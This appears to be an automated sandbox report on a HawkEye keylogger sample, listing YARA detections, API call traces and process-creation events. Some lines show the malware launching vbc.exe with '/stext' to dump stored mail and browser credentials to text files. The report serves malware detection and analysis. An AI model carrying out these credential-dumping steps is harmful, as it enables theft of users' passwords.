Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.284a904.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500849311.0000000007BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\TGQfHfehsY.exe | Code function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00442A90 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0249685A NtWriteVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0249670A NtQuerySystemInformation,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_024967B2 NtResumeThread,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0249682D NtWriteVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_024966C6 NtQuerySystemInformation,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                Source: TGQfHfehsY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/7@4/3
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
                Source: TGQfHfehsY.exeVirustotal: Detection: 32%
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile read: C:\Users\user\Desktop\TGQfHfehsY.exeJump to behavior
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\TGQfHfehsY.exe "C:\Users\user\Desktop\TGQfHfehsY.exe"
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_024941AE AdjustTokenPrivileges,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02494177 AdjustTokenPrivileges,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile created: C:\Users\user\AppData\Local\Temp\nsl8C59.tmpJump to behavior
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = 